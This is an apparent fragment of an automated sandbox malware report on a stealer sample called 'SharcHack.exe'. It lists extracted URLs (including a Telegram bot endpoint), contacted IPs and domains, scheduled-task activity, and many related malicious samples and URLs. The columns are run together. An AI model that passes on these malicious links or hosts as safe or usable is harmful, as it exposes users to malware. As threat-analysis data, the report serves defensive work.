                                                                                                                                                                            https://www.ccleaner.com/legal/end-usecense-agreemCheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.sqlite.org/langVegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.premieropinion.com/privacy-policyGCheatEngine75.tmp, 00000008.00000003.3038925703.0000000005C94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipp.png4CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://system.data.sqlite.org/System.Data.SQLite.Linq.dll.5.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://d31tu1fsc224h4.cloudfront.net:443/bdpCheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://www.nortonlifelock.com/us/en/privacy/OpCheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://webcompanion.com/privacys/CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUCheatEngine75.exe, 00000006.00000000.2043231186.0000000000401000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://d31tu1fsc224h4.cloudfront.net:443/CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.microsoft.cxpowershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://www.avast.com/eula-avast-consumer-productsCheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://api.telegram.org/botv2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://d34hwk9wxgk5fi.cloudfront.net/KCheatEngine75.tmp, 00000008.00000003.2141458144.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                            ip-api.comUnited States
                                                                                                                                                                                            53334TUT-ASUSfalse
                                                                                                                                                                                            3.165.135.3
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                            18.66.161.123
                                                                                                                                                                                            d14mh4uvqj4iiz.cloudfront.netUnited States
                                                                                                                                                                                            3MIT-GATEWAYSUSfalse
                                                                                                                                                                                            65.9.108.148
                                                                                                                                                                                            d34hwk9wxgk5fi.cloudfront.netUnited States
                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                            104.21.85.189
                                                                                                                                                                                            ipbase.comUnited States
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            65.9.108.93
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                            172.67.160.84
                                                                                                                                                                                            freegeoip.appUnited States
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            13.226.4.166
                                                                                                                                                                                            d31tu1fsc224h4.cloudfront.netUnited States
                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                            Analysis ID:1581756
                                                                                                                                                                                            Start date and time:2024-12-28 22:19:08 +01:00
                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 12m 0s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                            Number of analysed new started processes analysed:65
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Sample name:SharcHack.exe
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.mine.winEXE@113/99@12/8
                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                            • Successful, ratio: 86%
                                                                                                                                                                                            • Number of executed functions: 68
                                                                                                                                                                                            • Number of non-executed functions: 316
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 20.242.39.171, 13.85.23.206, 13.107.246.63
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): analytics.apis.mcafee.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, sadownload.mcafee.com, ctldl.windowsupdate.com, pool.hashvault.pro, update.reasonsecurity.com, pac.rlinfraservices.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, localweatherfree.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                            16:19:56API Interceptor1x Sleep call for process: 3.exe modified
                                                                                                                                                                                            16:20:00API Interceptor94x Sleep call for process: powershell.exe modified
                                                                                                                                                                                            16:20:04API Interceptor57x Sleep call for process: v2.exe modified
                                                                                                                                                                                            16:20:10API Interceptor13x Sleep call for process: CheatEngine75.tmp modified
                                                                                                                                                                                            16:20:25API Interceptor1x Sleep call for process: updater.exe modified
                                                                                                                                                                                            16:20:58API Interceptor409x Sleep call for process: conhost.exe modified
                                                                                                                                                                                            22:20:16Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                                                            22:22:03Task SchedulerRun new task: EPPHealthCheck_Logon path: C:\Program Files\ReasonLabs\EPP\Uninstall.exe s>/auto-repair="UnifiedStub" /trigger:logon
                                                                                                                                                                                            22:22:03Task SchedulerRun new task: EPPHealthCheck_Time path: C:\Program Files\ReasonLabs\EPP\Uninstall.exe s>/auto-repair="UnifiedStub" /trigger:time
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            208.95.112.1SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                            • ip-api.com/json/?fields=61439
                                                                                                                                                                                            987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                            good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                            • ip-api.com/json/
                                                                                                                                                                                            Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                            • ip-api.com/json/
                                                                                                                                                                                            DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                            • ip-api.com/json/?fields=225545
                                                                                                                                                                                            main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                                                                                                                            • ip-api.com/json/8.46.123.189?fields=192511
                                                                                                                                                                                            main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ip-api.com/json/8.46.123.189?fields=192511
                                                                                                                                                                                            HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                            • ip-api.com/json/?fields=225545
                                                                                                                                                                                            dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                            2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                            104.21.85.189ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                                                              Loader.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                                                                Nursultan.exeGet hashmalicious44Caliber Stealer, BlackGuard, Blank Grabber, Rags Stealer, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                  Pots.exeGet hashmalicious44userber Stealer, Rags StealerBrowse
                                                                                                                                                                                                    aurora-live-20240221.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      dudick SystemDesk Important Crediential Notification 1.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        64drop.exeGet hashmalicious44Caliber Stealer, Rags StealerBrowse
                                                                                                                                                                                                          123.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            RP.sfx.exeGet hashmalicious44Caliber Stealer, Rags StealerBrowse
                                                                                                                                                                                                              i6R4NsEd8t.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                ip-api.comSharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                cheatengine.orgSecuriteInfo.com.Trojan.InstallCore.4077.25967.22716.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                • 104.20.94.94
                                                                                                                                                                                                                SecuriteInfo.com.Trojan.InstallCore.4077.25967.22716.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                • 172.67.35.220
                                                                                                                                                                                                                ipbase.comSharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                • 172.67.209.71
                                                                                                                                                                                                                ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                Loader.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                Nursultan.exeGet hashmalicious44Caliber Stealer, BlackGuard, Blank Grabber, Rags Stealer, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                External.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                                                                                • 172.67.209.71
                                                                                                                                                                                                                xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                                                                                                                                                                                                                • 172.67.209.71
                                                                                                                                                                                                                Pots.exeGet hashmalicious44userber Stealer, Rags StealerBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                qdHMT36Tn9.exeGet hashmalicious44Caliber Stealer, Njrat, Rags StealerBrowse
                                                                                                                                                                                                                • 172.67.209.71
                                                                                                                                                                                                                64drop.exeGet hashmalicious44Caliber Stealer, Rags StealerBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                123.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                bg.microsoft.map.fastly.net3KFFG52TBI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                wp.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                final.exeGet hashmaliciousMeterpreterBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                eu-api.openweathermap.orghttp://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                                                                                                                • 141.95.99.79
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                AMAZON-02UShttps://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                • 3.160.188.119
                                                                                                                                                                                                                oiA5KmV0f0.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                • 18.197.239.5
                                                                                                                                                                                                                db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                • 35.75.100.61
                                                                                                                                                                                                                arm6.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                wlw68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                https://app.slintel-privacy.com/links/J95tSop4o/SS6JytVVw/qm84IUL58/GFC-9kqk1-Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 3.109.113.207
                                                                                                                                                                                                                http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfhGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 44.237.4.100
                                                                                                                                                                                                                arm6.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                TUT-ASUSSharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.252.214.4
                                                                                                                                                                                                                Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                AMAZON-02UShttps://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                • 3.160.188.119
                                                                                                                                                                                                                oiA5KmV0f0.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                • 18.197.239.5
                                                                                                                                                                                                                db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                • 35.75.100.61
                                                                                                                                                                                                                arm6.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                wlw68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                https://app.slintel-privacy.com/links/J95tSop4o/SS6JytVVw/qm84IUL58/GFC-9kqk1-Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 3.109.113.207
                                                                                                                                                                                                                http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfhGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 44.237.4.100
                                                                                                                                                                                                                arm6.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                MIT-GATEWAYSUSHwacaj.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                                                                                                • 18.161.69.8
                                                                                                                                                                                                                https://haleborealis.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 18.165.220.57
                                                                                                                                                                                                                https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 18.161.97.93
                                                                                                                                                                                                                db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                • 19.235.79.192
                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                • 18.165.220.106
                                                                                                                                                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                • 18.165.220.66
                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                • 18.164.116.98
                                                                                                                                                                                                                xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 18.113.234.176
                                                                                                                                                                                                                xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 19.34.137.22
                                                                                                                                                                                                                xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 18.50.43.230
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0el0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                Titan.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                Titan.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                738KZNfnzz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.85.189
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 172.67.160.84
                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                !Set-up..exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
